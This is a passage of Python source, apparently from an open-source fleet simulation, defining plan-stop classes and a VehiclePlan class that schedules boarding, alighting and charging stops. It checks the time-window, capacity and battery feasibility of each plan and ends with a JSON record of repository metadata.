reloc target)\n :return: (bool)\"\"\"\n if self.change_nr_pax == 0 and len(self.boarding_dict.get(1, [])) == 0 and len(self.boarding_dict.get(-1, [])) == 0 and self.charging_power == 0: #and len(self.planned_departure) == 0\n return True\n else:\n return False\n\nclass BoardingPlanStop(PlanStop):\n \"\"\" this class can be used to generate a plan stop where only boarding processes take place \"\"\"\n def __init__(self, position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={},\n earliest_pickup_time_dict={}, latest_pickup_time_dict={}, change_nr_pax=0, change_nr_parcels=0, duration=None, locked=False):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param boarding_dict: dictionary with entries +1 -> list of request ids that board the vehicle there; -1 -> list of requests that alight the vehicle there\n :param max_trip_time_dict: dictionary request_id -> maximum trip time of all requests alighting at this stop to check max trip time constraint\n :param latest_arrival_time_dict: dictionary request_id -> absolute latest arival time of all requests alighting at this stop to check latest arrival time constraint\n :param earliest_pickup_time_dict: dictionary request_id -> earliest pickup time of all requests boarding at this stop to check earliest pickup time constraint\n :param latest_pickup_time_dict: dictionary request_id -> latest pickup time of all requests boarding at this top to check latest pickup time constraint\n :param change_nr_pax: (int) change of number of passengers at this point: number people boarding - number people alighting to check capacity constraint\n :param change_nr_parcels: (int) change of number of parcels at this point: number boarding parcels - number alighting parcels to check capacity constraint\n :param duration: (float) minimum duration this plan stops takes at this location\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. 
currently only working when also all planstops before this planstop are locked, too\n \"\"\"\n super().__init__(position, boarding_dict=boarding_dict, max_trip_time_dict=max_trip_time_dict,\n latest_arrival_time_dict=latest_arrival_time_dict, earliest_pickup_time_dict=earliest_pickup_time_dict,\n latest_pickup_time_dict=latest_pickup_time_dict, change_nr_pax=change_nr_pax, change_nr_parcels=change_nr_parcels,\n earliest_start_time=None, latest_start_time=None,\n duration=duration, earliest_end_time=None, locked=locked,\n charging_power=0, planstop_state=G_PLANSTOP_STATES.BOARDING)\n \nclass RoutingTargetPlanStop(PlanStop):\n \"\"\" this plan stop can be used to schedule a routing target for vehicles with the only task to drive there\n i.e repositioning\"\"\"\n def __init__(self, position, earliest_start_time=None, latest_start_time=None, duration=None, earliest_end_time=None, locked=False, locked_end=True, planstop_state=G_PLANSTOP_STATES.REPO_TARGET):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stops takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignemnt algorithm (insertions before are possible!)\n :param planstop_state: (G_PLANSTOP_STATES) indicates the planstop state. should be in (REPO_TARGET, INACTIVE, RESERVATION)\n \"\"\"\n super().__init__(position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, earliest_pickup_time_dict={}, latest_pickup_time_dict={},\n change_nr_pax=0, earliest_start_time=earliest_start_time, latest_start_time=latest_start_time, duration=duration,\n earliest_end_time=earliest_end_time, locked=locked, locked_end=locked_end, charging_power=0, planstop_state=planstop_state)\n\nclass ChargingPlanStop(PlanStop):\n \"\"\" this plan stop can be used to schedule a charging only process \"\"\"\n def __init__(self, position, earliest_start_time=None, latest_start_time=None, duration=None, \n earliest_end_time=None, locked=False, locked_end=False, charging_power=0,\n charging_task_id: Tuple[int, str] = None, status: Optional[VRL_STATES] = None):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stops takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. 
currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignment algorithm (insertions before are possible!) \n :param charging_power: optional (float); if given the vehicle is charged with this power (TODO unit!) while at this stop\n \"\"\"\n super().__init__(position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, \n earliest_pickup_time_dict={}, latest_pickup_time_dict={}, change_nr_pax=0, \n earliest_start_time=earliest_start_time, latest_start_time=latest_start_time, duration=duration, \n earliest_end_time=earliest_end_time, locked=locked, locked_end=locked_end, charging_power=charging_power, \n planstop_state=G_PLANSTOP_STATES.CHARGING, charging_task_id=charging_task_id, status=status)\n\nclass VehiclePlan:\n \"\"\" this class is used to plan tasks for a vehicle and evaluates the feasibility of the time constraints of this plan\n a VehiclePlan mainly consists of two parts:\n - a vehicle this plan is assigned to, and therefore the current state of the vehicle\n - an ordered list of PlanStops defining the tasks the vehicle is supposed to perform (vehicles move from one plan stop to another)\"\"\"\n def __init__(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, list_plan_stops : List[PlanStopBase], copy: bool =False, external_pax_info : dict = {}):\n \"\"\"\n :param veh_obj: corresponding simulation vehicle reference\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param list_plan_stops: ordered list of plan stops to perform\n :param copy: optional; set if this init is used to create a copy of the plan (only for internal use)\n :param external_pax_info: optional; dictionary of already computed pax info (only for internal use)\n \"\"\"\n self.list_plan_stops = list_plan_stops\n self.utility = None\n # pax info:\n # rid -> [start_boarding, end_alighting] where start_boarding can be in past or planned\n # rid -> [start_boarding_time] in case only boarding is planned\n self.pax_info = external_pax_info\n self.vid = None\n self.feasible = None\n self.structural_feasible = True # indicates if plan is in line with vehicle state ignoring time constraints\n if not copy:\n self.vid = veh_obj.vid\n self.feasible = self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=True)\n\n def __str__(self):\n return \"veh plan for vid {} feasible?
{} : {} | pax info {}\".format(self.vid, self.feasible,\n [str(x) for x in self.list_plan_stops],\n self.pax_info)\n\n def copy(self):\n \"\"\"\n creates a copy\n \"\"\"\n tmp_VehiclePlan = VehiclePlan(None, None, None, [ps.copy() for ps in self.list_plan_stops], copy=True)\n tmp_VehiclePlan.vid = self.vid\n tmp_VehiclePlan.utility = self.utility\n tmp_VehiclePlan.pax_info = self.pax_info.copy()\n tmp_VehiclePlan.feasible = True\n return tmp_VehiclePlan\n\n def is_feasible(self) -> bool:\n \"\"\" this method can be used to check if the plan is feasible\n :return: (bool) True if feasible\"\"\"\n return self.feasible\n\n def is_structural_feasible(self) -> bool:\n \"\"\" indicates if the stop order is feasible with the current vehicle state (ignoring time constraints) \n :return: (bool) True if structurally feasible \"\"\"\n return self.structural_feasible\n\n def get_pax_info(self, rid) -> list:\n \"\"\" this function returns passenger info regarding the planned boarding and alighting times for this plan\n :param rid: request id involved in this plan\n :return: list of length at most 2; first entry planned boarding time; second entry planned alighting time; None if no information found\"\"\"\n return self.pax_info.get(rid)\n\n def get_involved_request_ids(self) -> list:\n \"\"\" get a list of all request ids that are scheduled in this plan \n :return: list of request ids\"\"\"\n return list(self.pax_info.keys())\n\n def set_utility(self, utility_value : float):\n \"\"\" this method is used to set the utility (cost function value) of this plan\n :param utility_value: float of utility value\"\"\"\n self.utility = utility_value\n\n def get_utility(self) -> float:\n \"\"\" returns the utility value of the plan (None if not set yet)\n :return: utility value (cost function value) or None\"\"\"\n return self.utility\n\n def add_plan_stop(self, plan_stop : PlanStopBase, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, return_copy : bool=False, position : tuple=None):\n \"\"\"This method adds a plan stop to an existing vehicle plan. After that, it updates the plan.\n\n :param plan_stop: new plan stop\n :param veh_obj: simulation vehicle instance\n :param sim_time: current simulation time\n :param routing_engine: routing engine\n :param return_copy: controls whether the current plan is changed or a changed copy will be returned\n :param position: position in list_plan_stops in which the plan stop should be added\n :return: None (return_copy=False) or VehiclePlan instance (return_copy=True)\n \"\"\"\n if return_copy:\n new_veh_plan = self.copy()\n else:\n new_veh_plan = self\n if position is None:\n new_veh_plan.list_plan_stops.append(plan_stop)\n else:\n new_veh_plan.list_plan_stops.insert(position, plan_stop)\n new_veh_plan.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=True)\n if return_copy: # return the modified copy as promised by the docstring\n return new_veh_plan\n\n def update_plan(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, list_passed_VRLs : List[VehicleRouteLeg]=None, keep_time_infeasible : bool=True) -> bool:\n \"\"\"This method checks whether the simulation vehicle passed some of the planned stops and removes them from the\n plan after passing.
It returns the feasibility of the plan.\n\n :param veh_obj: vehicle object to which plan is applied\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param list_passed_VRLs: list of passed VRLs\n :param keep_time_infeasible: if True, the feasibility evaluation continues even after an infeasibility of time constraints has been found\n :return: (bool) True if the plan is feasible, i.e. all constraints are fulfilled\n \"\"\"\n # 1) check if list_passed_VRLs invalidates the plan or removes some stops\n # LOG.debug(\"update_plan\")\n self.feasible = True\n if list_passed_VRLs is None:\n list_passed_VRLs = []\n # LOG.debug(str(self))\n # LOG.debug([str(x) for x in list_passed_VRLs])\n # LOG.debug([str(x) for x in self.list_plan_stops])\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n if list_passed_VRLs and self.list_plan_stops:\n for vrl in list_passed_VRLs:\n if vrl.status in G_DRIVING_STATUS or vrl.status in G_LAZY_STATUS:\n continue\n # if vrl.status in G_LAZY_STATUS:\n # # waiting part should not be part of the vehicle plan\n # continue\n # if vrl.status in G_DRIVING_STATUS or vrl.status in G_LAZY_STATUS:\n # if vrl.destination_pos == self.list_plan_stops[0].get_pos() and self.list_plan_stops[0].is_empty():\n # # LOG.info(\"jumped ps {} because of vrl {}\".format(self.list_plan_stops[0], vrl))\n # self.list_plan_stops = self.list_plan_stops[1:]\n # continue\n if vrl.destination_pos == self.list_plan_stops[0].get_pos():\n # plan infeasible as soon as other people board the vehicle\n rid_boarded_at_stop = set([key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n for rq in vrl.rq_dict.get(1, [])])\n if not rid_boarded_at_stop == set(self.list_plan_stops[0].get_list_boarding_rids()):\n # LOG.debug(\" -> wrong boarding\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # other people alighting should not be possible.
keep the check nevertheless\n rid_alighted_at_stop = set([key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in\n vrl.rq_dict.get(-1, [])])\n if not rid_alighted_at_stop == set(self.list_plan_stops[0].get_list_alighting_rids()):\n # LOG.debug(\" -> wrong alighting\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # remove stop from plan\n self.list_plan_stops = self.list_plan_stops[1:]\n else:\n # plan infeasible as soon as anybody boarded or alighted the vehicle\n if vrl.rq_dict.get(1) or vrl.rq_dict.get(-1):\n # LOG.debug(\" -> unplanned boarding step\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # 2) check for current boarding processes and check if current stop should be locked\n if veh_obj.assigned_route and self.list_plan_stops:\n ca = veh_obj.assigned_route[0]\n if not ca.status in G_DRIVING_STATUS and not ca.status in G_LAZY_STATUS:\n if ca.destination_pos == self.list_plan_stops[0].get_pos():\n rid_boarding_at_stop = set(\n [key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in ca.rq_dict.get(1, [])])\n if not rid_boarding_at_stop == set(self.list_plan_stops[0].get_list_boarding_rids()):\n # LOG.debug(\" -> current boarding state is wrong!\")\n self.feasible = False\n self.structural_feasible = False\n return False\n rid_deboarding_at_stop = set(\n [key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in ca.rq_dict.get(-1, [])])\n if not rid_deboarding_at_stop == set(self.list_plan_stops[0].get_list_alighting_rids()):\n # LOG.debug(\" -> current deboarding state is wrong!\")\n self.feasible = False\n self.structural_feasible = False\n return False\n else:\n # LOG.debug(\" -> infeasible planned stop\")\n self.feasible = False\n self.structural_feasible = False\n return False\n\n if ca.locked and ca.destination_pos == self.list_plan_stops[0].get_pos():\n # LOG.debug(\" -> LOCK!\")\n self.list_plan_stops[0].set_locked(True)\n # LOG.verbose(\"set starting time: {}\".format(veh_obj.cl_start_time))\n if not ca.status in G_DRIVING_STATUS and not ca.status in G_LAZY_STATUS: # TODO #\n self.list_plan_stops[0].set_started_at(veh_obj.cl_start_time)\n\n # 3) update planned attributes (arrival_time, arrival_soc, departure)\n # LOG.debug(\"after update plan:\")\n # LOG.debug(str(self))\n # LOG.debug(f\"currently ob: {veh_obj.pax}\")\n self.feasible = self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine,\n keep_feasible=keep_time_infeasible)\n return self.feasible\n\n def return_intermediary_plan_state(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, stop_index : int) -> dict:\n \"\"\" this function evaluates the future vehicle state after it would have performed the next stop_index plan stops of the vehicle plan\n and returns a dictionary specifying the vehicle state\n :param veh_obj: reference to the vehicle object\n :param sim_time: simulation time\n :param routing_engine: routing engine reference\n :param stop_index: index of list plan stops of vehicle plan until the state is evaluated\n :return: dictionary specifying the future vehicle state\"\"\"\n c_pos = veh_obj.pos\n c_soc = veh_obj.soc\n c_time = sim_time\n if self.list_plan_stops[0].is_locked(): # set time at start_time of boarding process\n boarding_started = self.list_plan_stops[0].get_started_at()\n if boarding_started is not None:\n c_time = boarding_started\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n c_pax =
{key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()): 1 for rq in veh_obj.pax}\n nr_pax = veh_obj.get_nr_pax_without_currently_boarding() # sum([rq.nr_pax for rq in veh_obj.pax])\n nr_parcels = veh_obj.get_nr_parcels_without_currently_boarding()\n self.pax_info = {}\n for rq in veh_obj.pax:\n rid = key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n self.pax_info[rid] = [rq.pu_time]\n # for pstop in self.list_plan_stops[:stop_index + 1]:\n for i, pstop in enumerate(self.list_plan_stops[:stop_index + 1]):\n if c_pos != pstop.get_pos():\n _, tt, tdist = routing_engine.return_travel_costs_1to1(c_pos, pstop.get_pos())\n c_pos = pstop.get_pos()\n c_time += tt\n c_soc -= veh_obj.compute_soc_consumption(tdist)\n if c_pos == pstop.get_pos():\n last_c_time = c_time\n last_c_soc = c_soc\n\n earliest_time = pstop.get_earliest_start_time()\n if c_time < earliest_time:\n c_time = earliest_time\n # LOG.debug(f\"c_time 3 {c_time}\")\n # update pax and check max. passenger constraint\n nr_pax += pstop.get_change_nr_pax()\n nr_parcels += pstop.get_change_nr_parcels()\n for rid in pstop.get_list_boarding_rids():\n if self.pax_info.get(rid):\n continue\n self.pax_info[rid] = [c_time]\n c_pax[rid] = 1\n for rid in pstop.get_list_alighting_rids():\n self.pax_info[rid].append(c_time)\n try:\n del c_pax[rid]\n except KeyError:\n LOG.warning(f\"return_intermediary_plan_state(): trying to remove a rid that is not on board!\")\n \n # set departure time\n c_time = pstop.get_departure_time(c_time)\n pstop.set_planned_arrival_and_departure_time(last_c_time, c_time)\n # set charge\n if pstop.get_charging_power() > 0: # TODO # is charging now in waiting included as planned here?\n c_soc += veh_obj.compute_soc_charging(pstop.get_charging_power(), c_time - last_c_time)\n c_soc = min(c_soc, 1.0) # cap the SOC at 1.0 (a full battery)\n pstop.set_planned_arrival_and_departure_soc(last_c_soc, c_soc)\n \n return {\"stop_index\": stop_index, \"c_pos\": c_pos, \"c_soc\": c_soc, \"c_time\": c_time, \"c_pax\": c_pax,\n \"pax_info\": self.pax_info.copy(), \"c_nr_pax\": nr_pax, \"c_nr_parcels\" : nr_parcels}\n\n def update_tt_and_check_plan(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, init_plan_state : dict=None, keep_feasible : bool=False):\n \"\"\"This method updates the planning properties of all PlanStops of the Plan according to the new vehicle\n position and checks if it is still feasible.\n\n :param veh_obj: vehicle object to which plan is applied\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param init_plan_state: {} requires \"stop_index\", \"c_pos\", \"c_soc\", \"c_time\", \"c_pax\", \"c_nr_pax\", \"c_nr_parcels\" and \"pax_info\"\n :param keep_feasible: useful flag to keep assigned VehiclePlans for simulations with dynamic travel times\n :return: (bool) True if the plan is feasible, i.e. all constraints are fulfilled\n \"\"\"\n # TODO # think about update of duration of VehicleChargeLegs\n # LOG.debug(f\"update tt and check plan {veh_obj} pax {veh_obj.pax} | at {sim_time} | pax info {self.pax_info}\")\n is_feasible = True\n if len(self.list_plan_stops) == 0:\n self.pax_info = {}\n return is_feasible\n infeasible_index = -1 # lock all plan stops until last infeasible stop if vehplan is forced to stay feasible\n if init_plan_state is not None:\n start_stop_index = init_plan_state[\"stop_index\"] + 1\n c_pos = init_plan_state[\"c_pos\"]\n c_soc = init_plan_state[\"c_soc\"]\n c_time = init_plan_state[\"c_time\"]\n c_pax = init_plan_state[\"c_pax\"].copy()\n c_nr_pax = init_plan_state[\"c_nr_pax\"]\n c_nr_parcels =
init_plan_state[\"c_nr_parcels\"]\n self.pax_info = {}\n for k, v in init_plan_state[\"pax_info\"].items():\n self.pax_info[k] = v.copy()\n # LOG.debug(f\"init plan state available | c_pos {c_pos} c_pax {c_pax} pax info {self.pax_info}\")\n else:\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n self.pax_info = {}\n start_stop_index = 0\n c_pos = veh_obj.pos\n c_soc = veh_obj.soc\n c_time = sim_time\n if self.list_plan_stops[0].is_locked(): # set time at start_time of boarding process\n boarding_started = self.list_plan_stops[0].get_started_at()\n if boarding_started is not None:\n c_time = boarding_started\n c_pax = {key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()): 1 for rq in veh_obj.pax}\n c_nr_pax = veh_obj.get_nr_pax_without_currently_boarding() # sum([rq.nr_pax for rq in veh_obj.pax])\n c_nr_parcels = veh_obj.get_nr_parcels_without_currently_boarding()\n for rq in veh_obj.pax:\n # LOG.debug(f\"add pax info {rq.get_rid_struct()} : {rq.pu_time}\")\n rid = key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n self.pax_info[rid] = [rq.pu_time]\n #LOG.verbose(\"init pax {} | {} | {}\".format(c_pax, veh_obj.pax, self.pax_info))\n # LOG.debug(f\"c_time 1 {c_time}\")\n for i in range(start_stop_index, len(self.list_plan_stops)):\n pstop = self.list_plan_stops[i]\n #for i, pstop in enumerate(self.list_plan_stops[start_stop_index:], start=start_stop_index):\n pstop_pos = pstop.get_pos()\n if c_pos != pstop_pos:\n if not is_feasible and not keep_feasible:\n # LOG.debug(f\" -> break because infeasible | is feasible {is_feasible} keep_feasible {keep_feasible}\")\n break\n _, tt, tdist = routing_engine.return_travel_costs_1to1(c_pos, pstop_pos)\n c_pos = pstop_pos\n c_time += tt\n # LOG.debug(f\"c_time 2 {c_time}\")\n\n c_soc -= veh_obj.compute_soc_consumption(tdist)\n if c_soc < 0:\n is_feasible = False\n infeasible_index = i\n # LOG.debug(\" -> charging wrong\")\n\n if c_pos == pstop_pos:\n\n last_c_time = c_time\n last_c_soc = c_soc\n\n earliest_time = pstop.get_earliest_start_time()\n if c_time < earliest_time:\n c_time = earliest_time\n # LOG.debug(f\"c_time 3 {c_time}\")\n # update pax and check max. 
passenger constraint\n c_nr_pax += pstop.get_change_nr_pax()\n c_nr_parcels += pstop.get_change_nr_parcels()\n #LOG.debug(f\"change nr pax {pstop.change_nr_pax}\")\n for rid in pstop.get_list_boarding_rids():\n if i == 0 and self.pax_info.get(rid):\n continue\n self.pax_info[rid] = [c_time]\n c_pax[rid] = 1\n for rid in pstop.get_list_alighting_rids():\n self.pax_info[rid].append(c_time)\n try:\n del c_pax[rid]\n except KeyError:\n LOG.warning(f\"update_tt_and_check_plan(): trying to remove a rid that is not on board!\")\n LOG.warning(f\"{self}\")\n is_feasible = False\n infeasible_index = i\n raise EnvironmentError\n # LOG.debug(\"pax info {}\".format(self.pax_info))\n latest_time = pstop.get_latest_start_time(self.pax_info)\n if c_time > latest_time:\n is_feasible = False\n infeasible_index = i\n # LOG.debug(f\" -> arrival after latest {c_time} > {latest_time}\")\n #LOG.debug(f\"-> c nr {c_nr_pax} | cap {veh_obj.max_pax}\")\n if c_nr_pax > veh_obj.max_pax or c_nr_parcels > veh_obj.max_parcels:\n # LOG.debug(\" -> capacity wrong\")\n is_feasible = False\n infeasible_index = i\n\n c_time = pstop.get_departure_time(c_time)\n pstop.set_planned_arrival_and_departure_time(last_c_time, c_time)\n\n if pstop.get_charging_power() > 0: # TODO # is charging now in waiting included as planned here?\n c_soc += veh_obj.compute_soc_charging(pstop.get_charging_power(), c_time - last_c_time)\n c_soc = min(c_soc, 1.0) # cap the SOC at 1.0 (a full battery)\n pstop.set_planned_arrival_and_departure_soc(last_c_soc, c_soc)\n \n if keep_feasible and not is_feasible:\n for i, p_stop in enumerate(self.list_plan_stops):\n if i > infeasible_index:\n break\n # LOG.debug(\"LOCK because infeasible {}\".format(i))\n p_stop.set_infeasible_locked(True)\n # LOG.debug(f\"is feasible {is_feasible} | pax info {self.pax_info}\")\n # LOG.debug(\"update plan and check tt {}\".format(self))\n return is_feasible\n\n def get_dedicated_rid_list(self) -> list:\n \"\"\" returns a list of request ids which are part of this vehicle plan\n :return: list of rid\n \"\"\"\n return list(self.pax_info.keys())\n\n def update_prq_hard_constraints(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, prq : PlanRequest, new_lpt : float, new_ept : float=None,\n keep_feasible : bool=False):\n \"\"\"Adapts the earliest_pickup_time_dict and latest_pickup_time_dict of the pick-up PlanStop of a request.\n\n :param veh_obj: simulation vehicle\n :param sim_time: current simulation time\n :param routing_engine: routing engine\n :param prq: PlanRequest\n :param new_lpt: new latest pick-up time constraint\n :param new_ept: new earliest pick-up time constraint, not set if None\n :param keep_feasible: optional argument to add as input in update_tt_and_check_plan\n :return: feasibility of plan\n :rtype: bool\n \"\"\"\n for ps in self.list_plan_stops:\n if prq.get_rid_struct() in ps.get_list_boarding_rids():\n ps.update_rid_boarding_time_constraints(new_latest_pickup_time=new_lpt, new_earliest_pickup_time=new_ept)\n return self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=keep_feasible)\n\n def copy_and_remove_empty_planstops(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase):\n \"\"\" this function removes all plan stops from the vehicle plan that are empty,\n i.e.
are not locked and no pick-ups/drop-offs are performed\n :param veh_obj: vehicle object\n :param sim_time: simulation time\n :param routing_engine: routing engine\n :return: vehicle plan without empty planstops\n :rtype: VehiclePlan\n \"\"\"\n new_plan = self.copy()\n tmp = []\n rm = False\n for ps in new_plan.list_plan_stops:\n if not ps.is_empty() or ps.is_locked() or ps.is_locked_end():\n tmp.append(ps)\n else:\n rm = True\n if rm:\n new_plan.list_plan_stops = tmp\n new_plan.update_tt_and_check_plan(veh_obj, sim_time, routing_engine)\n return new_plan", "repo_name": "TUM-VT/FleetPy", "sub_path": "src/fleetctrl/planning/VehiclePlan.py", "file_name": "VehiclePlan.py", "file_ext": "py", "file_size_in_byte": 55852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 38, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 45, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 51, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 56, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 61, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 67, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 71, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 78, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 88, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 93, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 98, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 103, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 108, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 114, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 120, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 125, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 129, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 130, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 134, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 139, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 144, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 149, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 155, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 160, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 165, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 170, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 175, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 181, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 187, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 193, "usage_type": "name"}, {"api_name": "abc.abstractmethod",
"line_number": 200, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.floor", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 369, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 404, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 519, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 519, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 541, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 541, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 541, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 610, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 610, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 631, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 631, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 631, "usage_type": "name"}, {"api_name": "src.simulation.Legs.VehicleRouteLeg", "line_number": 631, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 729, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 729, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 794, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 794, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 927, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 927, "usage_type": "name"}, {"api_name": "src.fleetctrl.planning.PlanRequest.PlanRequest", "line_number": 927, "usage_type": "name"}, {"api_name": "src.simulation.Vehicles.SimulationVehicle", "line_number": 946, "usage_type": "name"}, {"api_name": "src.routing.NetworkBase.NetworkBase", "line_number": 946, "usage_type": "name"}]}
